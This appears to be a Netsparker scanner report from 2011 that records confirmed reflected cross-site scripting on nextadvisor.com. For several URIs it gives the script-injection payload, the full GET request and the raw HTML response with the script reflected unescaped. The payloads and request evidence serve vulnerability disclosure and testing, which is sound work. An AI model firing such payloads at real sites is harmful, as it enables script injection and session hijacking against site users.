myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000144)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000147)%3C/script%3E

/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000147)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000147)%3C..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000147)</script>

Request

GET /index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000147)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:56:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3525
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/index.php'"--></style></script><script>netsparker(0x000147)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000147)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000177)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000177)%3C/script%3E

/audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000177)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000177)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000177)</script>

Request

GET /audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000177)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/audiobooks/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6587
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", audiobooks, audio books, books on tape, books on CD, book downloads, audiobook downloads, mp3 books, Audible, Booksfree, eMusic Audiobooks, Simply Audiobooks, iTunes, Barnes & Noble" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/audiobooks/'"--></style></script><script>netsparker(0x000177)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x000177)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/audiobooks_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Audiobook Downloads and Rentals FAQ</h1> <p>Frequently Asked Questions about Audiobook Downloads and Rentals</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Audiobook Downloads and Rentals:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="audiobooks"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a 